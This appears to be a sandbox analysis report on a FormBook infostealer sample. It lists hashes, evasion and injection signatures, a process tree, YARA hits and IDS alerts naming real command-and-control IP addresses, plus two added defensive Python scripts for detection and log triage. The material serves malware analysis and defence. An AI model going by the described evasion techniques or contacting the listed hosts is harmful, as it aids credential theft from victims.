

Windows Analysis Report
suBpo1g13Q.exe

Overview

General Information

Sample name: suBpo1g13Q.exe (renamed because the original name is a hash value)
Original sample name: b7b7efd934672f580ac36002b4f9524decc68c309052dbdf16f26c48c6d1d268.exe
Analysis ID: 1588629
MD5: d8ba09db25afabba3143cb47dd6b8f37
SHA1: 5e19b80e13c51ac6f3e1d196e5c3b73ecefd5e98
SHA256: b7b7efd934672f580ac36002b4f9524decc68c309052dbdf16f26c48c6d1d268
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • suBpo1g13Q.exe (PID: 7188 cmdline: "C:\Users\user\Desktop\suBpo1g13Q.exe" MD5: D8BA09DB25AFABBA3143CB47DD6B8F37)
    • suBpo1g13Q.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\suBpo1g13Q.exe" MD5: D8BA09DB25AFABBA3143CB47DD6B8F37)
    • suBpo1g13Q.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\suBpo1g13Q.exe" MD5: D8BA09DB25AFABBA3143CB47DD6B8F37)
      • iBkWOgpZKSoi.exe (PID: 3852 cmdline: "C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • waitfor.exe (PID: 6128 cmdline: "C:\Windows\SysWOW64\waitfor.exe" MD5: E58E152B44F20DD099C5105DE482DF24)
          • iBkWOgpZKSoi.exe (PID: 6148 cmdline: "C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7532 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
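The tree above shows three things worth turning into detection logic: the sample relaunches itself twice (the staging the "Creates a process in suspended mode" and thread-injection signatures describe), a copy placed under a random-named directory in Program Files (x86) spawns waitfor.exe, and waitfor.exe, a console utility that normally exits without children, goes on to launch another copy and firefox.exe (the browser-credential stage). The following is an added example, not Joe Sandbox output and not the sample's code, that applies those three checks to process-creation records. The records are constructed from the tree above (PIDs and paths copied from it); the record layout, the rule names and the list of "quiet" utilities are this example's own assumptions.

```python
import re

# Constructed from the process tree in the report (PIDs and image paths copied from it).
# The record layout is this example's own; map Sysmon Event ID 1 / EDR fields onto it.
PROCESSES = [
    {"pid": 7188, "ppid": 0,    "image": r"C:\Users\user\Desktop\suBpo1g13Q.exe"},
    {"pid": 7648, "ppid": 7188, "image": r"C:\Users\user\Desktop\suBpo1g13Q.exe"},
    {"pid": 7696, "ppid": 7648, "image": r"C:\Users\user\Desktop\suBpo1g13Q.exe"},
    {"pid": 3852, "ppid": 7696, "image": r"C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe"},
    {"pid": 6128, "ppid": 3852, "image": r"C:\Windows\SysWOW64\waitfor.exe"},
    {"pid": 6148, "ppid": 6128, "image": r"C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe"},
    {"pid": 7532, "ppid": 6128, "image": r"C:\Program Files\Mozilla Firefox\Firefox.exe"},
]

# Console utilities that normally run to completion without creating children (assumed list).
QUIET_UTILITIES = {"waitfor.exe", "timeout.exe", "ping.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# A directory name of 32+ letters with no spaces or digits is not a vendor or product name.
RANDOM_DIR = re.compile(r"^[A-Za-z]{32,}$")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def self_respawn_depth(proc, by_pid):
    """Count consecutive ancestors that run the same image as `proc`."""
    depth, cur = 0, proc
    while True:
        parent = by_pid.get(cur["ppid"])
        if parent is None or parent["image"].lower() != cur["image"].lower():
            return depth
        depth, cur = depth + 1, parent


def analyze(procs):
    """Return (rule, pid) findings for the three tells visible in the tree above."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        name = basename(p["image"])
        parent = by_pid.get(p["ppid"])
        parent_name = basename(parent["image"]) if parent else ""

        # 1. The sample relaunching itself twice: staging for self-injection / hollowing.
        depth = self_respawn_depth(p, by_pid)
        if depth >= 2:
            findings.append((f"self-respawn-x{depth}", p["pid"]))

        # 2. A quiet utility should never have children; a browser child is the stealer stage.
        if parent_name in QUIET_UTILITIES:
            rule = "browser-from-quiet-utility" if name in BROWSERS else "child-of-quiet-utility"
            findings.append((rule, p["pid"]))

        # 3. An executable dropped under Program Files in a random, letters-only directory.
        parts = p["image"].split("\\")
        if (len(parts) >= 4 and parts[1].lower().startswith("program files")
                and RANDOM_DIR.match(parts[2])):
            findings.append(("random-dir-under-program-files", p["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in analyze(PROCESSES):
        print(f"{rule:32} pid {pid}")
```

Rule 2 is the one with the best signal-to-noise ratio on a real fleet: waitfor.exe creating any child process is rare enough to alert on outright, and the browser child identifies which hollowed process to pull memory from.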
No configs have been found
Source | Rule | Description | Author
00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.1637335809.00000000013C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.3813776931.00000000045F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.3813875432.0000000004640000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(3 further entries collapsed in the original report)
Source | Rule | Description | Author
4.2.suBpo1g13Q.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
4.2.suBpo1g13Q.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T03:23:42.399727+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 51571 | 188.114.97.3 | 80 | TCP
2025-01-11T03:24:34.151744+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 49981 | 202.92.5.23 | 80 | TCP
2025-01-11T03:25:00.623837+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 51531 | 13.248.169.48 | 80 | TCP
2025-01-11T03:25:14.006163+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 51535 | 209.74.77.109 | 80 | TCP
2025-01-11T03:25:27.759474+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 51539 | 23.225.159.42 | 80 | TCP
2025-01-11T03:25:41.278253+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 51543 | 46.30.211.38 | 80 | TCP
2025-01-11T03:25:55.128049+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 51547 | 103.224.182.242 | 80 | TCP
2025-01-11T03:26:29.880732+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 51551 | 149.88.81.190 | 80 | TCP
2025-01-11T03:26:44.091940+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 51555 | 101.35.209.183 | 80 | TCP
2025-01-11T03:26:58.020315+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 51559 | 154.23.178.231 | 80 | TCP
2025-01-11T03:27:12.561931+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 51563 | 208.91.197.39 | 80 | TCP
2025-01-11T03:27:26.533155+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.10 | 51567 | 43.205.198.29 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T03:24:49.714073+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51528 | 13.248.169.48 | 80 | TCP
2025-01-11T03:24:52.334935+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51529 | 13.248.169.48 | 80 | TCP
2025-01-11T03:24:55.059812+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51530 | 13.248.169.48 | 80 | TCP
2025-01-11T03:25:06.361418+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51532 | 209.74.77.109 | 80 | TCP
2025-01-11T03:25:08.901515+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51533 | 209.74.77.109 | 80 | TCP
2025-01-11T03:25:11.603202+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51534 | 209.74.77.109 | 80 | TCP
2025-01-11T03:25:20.118806+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51536 | 23.225.159.42 | 80 | TCP
2025-01-11T03:25:22.665681+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51537 | 23.225.159.42 | 80 | TCP
2025-01-11T03:25:25.197026+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51538 | 23.225.159.42 | 80 | TCP
2025-01-11T03:25:33.524521+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51540 | 46.30.211.38 | 80 | TCP
2025-01-11T03:25:36.119532+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51541 | 46.30.211.38 | 80 | TCP
2025-01-11T03:25:38.736397+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51542 | 46.30.211.38 | 80 | TCP
2025-01-11T03:25:47.517154+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51544 | 103.224.182.242 | 80 | TCP
2025-01-11T03:25:50.025272+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51545 | 103.224.182.242 | 80 | TCP
2025-01-11T03:25:52.613341+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51546 | 103.224.182.242 | 80 | TCP
2025-01-11T03:26:02.403771+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51548 | 149.88.81.190 | 80 | TCP
2025-01-11T03:26:04.947928+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51549 | 149.88.81.190 | 80 | TCP
2025-01-11T03:26:07.494386+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51550 | 149.88.81.190 | 80 | TCP
2025-01-11T03:26:36.338277+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51552 | 101.35.209.183 | 80 | TCP
2025-01-11T03:26:38.905416+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51553 | 101.35.209.183 | 80 | TCP
2025-01-11T03:26:41.522600+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51554 | 101.35.209.183 | 80 | TCP
2025-01-11T03:26:50.384642+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51556 | 154.23.178.231 | 80 | TCP
2025-01-11T03:26:52.949820+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51557 | 154.23.178.231 | 80 | TCP
2025-01-11T03:26:56.104081+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51558 | 154.23.178.231 | 80 | TCP
2025-01-11T03:27:03.811881+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51560 | 208.91.197.39 | 80 | TCP
2025-01-11T03:27:06.348901+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51561 | 208.91.197.39 | 80 | TCP
2025-01-11T03:27:08.955074+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51562 | 208.91.197.39 | 80 | TCP
2025-01-11T03:27:18.813215+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51564 | 43.205.198.29 | 80 | TCP
2025-01-11T03:27:21.365405+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51565 | 43.205.198.29 | 80 | TCP
2025-01-11T03:27:23.923124+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51566 | 43.205.198.29 | 80 | TCP
2025-01-11T03:27:33.106849+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51568 | 188.114.97.3 | 80 | TCP
2025-01-11T03:27:35.682272+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51569 | 188.114.97.3 | 80 | TCP
2025-01-11T03:27:38.291581+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.10 | 51570 | 188.114.97.3 | 80 | TCP
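Read per destination, the two alert tables above show a fixed cadence: three check-ins matching the POST rule (SID 2855464) about 2.5 seconds apart, then one matching the GET rule (SID 2855465), then the implant moves on to the next address roughly 8 seconds later. The exceptions are 202.92.5.23 (only a GET) and 188.114.97.3 (a GET at the very start, the POSTs only at the end of the window). The added example below is not part of the report: it parses thirteen of those alerts rewritten in Suricata fast.log layout (timestamps, SIDs, ports and addresses are the report's; the rule revision field ":1" is assumed) and summarizes the check-in sequence, first-seen time and largest gap per destination, which is the view you want when deciding which addresses actually completed a cycle and in what order they were tried.

```python
import re
from collections import defaultdict
from datetime import datetime

POST_SID, GET_SID = 2855464, 2855465   # ETPRO FormBook CnC Checkin (POST) M3 / (GET) M2

# Constructed: thirteen alerts from the tables above in Suricata fast.log layout
# (rule revision ":1" assumed; everything else is copied from the report).
FAST_LOG = """\
01/11/2025-03:23:42.399727  [**] [1:2855465:1] ETPRO MALWARE FormBook CnC Checkin (GET) M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:51571 -> 188.114.97.3:80
01/11/2025-03:24:34.151744  [**] [1:2855465:1] ETPRO MALWARE FormBook CnC Checkin (GET) M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:49981 -> 202.92.5.23:80
01/11/2025-03:24:49.714073  [**] [1:2855464:1] ETPRO MALWARE FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:51528 -> 13.248.169.48:80
01/11/2025-03:24:52.334935  [**] [1:2855464:1] ETPRO MALWARE FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:51529 -> 13.248.169.48:80
01/11/2025-03:24:55.059812  [**] [1:2855464:1] ETPRO MALWARE FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:51530 -> 13.248.169.48:80
01/11/2025-03:25:00.623837  [**] [1:2855465:1] ETPRO MALWARE FormBook CnC Checkin (GET) M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:51531 -> 13.248.169.48:80
01/11/2025-03:25:06.361418  [**] [1:2855464:1] ETPRO MALWARE FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:51532 -> 209.74.77.109:80
01/11/2025-03:25:08.901515  [**] [1:2855464:1] ETPRO MALWARE FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:51533 -> 209.74.77.109:80
01/11/2025-03:25:11.603202  [**] [1:2855464:1] ETPRO MALWARE FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:51534 -> 209.74.77.109:80
01/11/2025-03:25:14.006163  [**] [1:2855465:1] ETPRO MALWARE FormBook CnC Checkin (GET) M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:51535 -> 209.74.77.109:80
01/11/2025-03:27:33.106849  [**] [1:2855464:1] ETPRO MALWARE FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:51568 -> 188.114.97.3:80
01/11/2025-03:27:35.682272  [**] [1:2855464:1] ETPRO MALWARE FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:51569 -> 188.114.97.3:80
01/11/2025-03:27:38.291581  [**] [1:2855464:1] ETPRO MALWARE FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.10:51570 -> 188.114.97.3:80
"""

LINE = re.compile(
    r"^(?P<ts>\d\d/\d\d/\d{4}-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+\[\d+:(?P<sid>\d+):\d+\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\].*?\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_fast_log(text):
    """Parse fast.log lines into dicts, oldest first; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            events.append({
                "ts": datetime.strptime(m["ts"], "%m/%d/%Y-%H:%M:%S.%f"),
                "sid": int(m["sid"]), "msg": m["msg"],
                "src": m["src"], "sport": int(m["sport"]),
                "dst": m["dst"], "dport": int(m["dport"]),
            })
    return sorted(events, key=lambda e: e["ts"])


def checkin_cycles(events):
    """Per destination: P/G sequence of check-ins, first-seen time, largest gap between them."""
    by_dst = defaultdict(list)
    for e in events:
        if e["sid"] in (POST_SID, GET_SID):
            by_dst[e["dst"]].append(e)
    cycles = {}
    for dst, evs in by_dst.items():
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(evs, evs[1:])]
        cycles[dst] = {
            "sequence": "".join("P" if e["sid"] == POST_SID else "G" for e in evs),
            "first_seen": evs[0]["ts"],
            "max_gap_s": max(gaps, default=0.0),
            "dports": sorted({e["dport"] for e in evs}),
        }
    return cycles


def rotation_order(cycles):
    """Destinations in the order the implant first tried them."""
    return [dst for dst, c in sorted(cycles.items(), key=lambda kv: kv[1]["first_seen"])]


if __name__ == "__main__":
    cycles = checkin_cycles(parse_fast_log(FAST_LOG))
    for dst in rotation_order(cycles):
        c = cycles[dst]
        print(f"{dst:16} {c['sequence']:6} first {c['first_seen'].time()} max gap {c['max_gap_s']:.1f}s")
```

A "PPPG" sequence with a largest gap of a few seconds is one complete cycle; a multi-minute largest gap (188.114.97.3 here) means the rows belong to two separate visits and the destination should be treated as one the implant returned to rather than one that answered.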


                AV Detection

Source: suBpo1g13Q.exe | Virustotal: Detection: 38%
Source: suBpo1g13Q.exe | ReversingLabs: Detection: 68%
Source: Yara match | File source: 4.2.suBpo1g13Q.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.suBpo1g13Q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1637335809.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3813776931.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3813875432.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3813882427.00000000022E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1638525330.00000000017C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: suBpo1g13Q.exe | Joe Sandbox ML: detected
Source: suBpo1g13Q.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: suBpo1g13Q.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: OGGCS.pdbSHA256 | source: suBpo1g13Q.exe
Source: Binary string: waitfor.pdbGCTL | source: suBpo1g13Q.exe, 00000004.00000002.1636951956.0000000001007000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000003.1875642312.000000000062B000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3809460967.0000000000618000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: waitfor.pdb | source: suBpo1g13Q.exe, 00000004.00000002.1636951956.0000000001007000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000003.1875642312.000000000062B000.00000004.00000020.00020000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000006.00000002.3809460967.0000000000618000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: iBkWOgpZKSoi.exe, 00000006.00000002.3804555588.000000000035E000.00000002.00000001.01000000.0000000C.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1709108519.000000000035E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP | source: suBpo1g13Q.exe, 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1638712535.00000000045AE000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1636800976.00000000043F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: suBpo1g13Q.exe, suBpo1g13Q.exe, 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1638712535.00000000045AE000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000003.1636800976.00000000043F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: OGGCS.pdb | source: suBpo1g13Q.exe
Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_0082CB90 FindFirstFileW,FindNextFileW,FindClose | 7_2_0082CB90
Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 4x nop then xor eax, eax | 7_2_00819F10
Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 4x nop then mov ebx, 00000004h | 7_2_04AB04CE

                Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51537 -> 23.225.159.42:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51532 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51530 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51553 -> 101.35.209.183:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49981 -> 202.92.5.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51534 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51533 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51541 -> 46.30.211.38:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51555 -> 101.35.209.183:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51550 -> 149.88.81.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51542 -> 46.30.211.38:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51569 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51539 -> 23.225.159.42:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51538 -> 23.225.159.42:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51536 -> 23.225.159.42:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51531 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51544 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51535 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51565 -> 43.205.198.29:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51543 -> 46.30.211.38:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51529 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51540 -> 46.30.211.38:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51547 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51548 -> 149.88.81.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51568 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51560 -> 208.91.197.39:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51551 -> 149.88.81.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:51559 -> 154.23.178.231:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:51556 -> 154.23.178.231:80
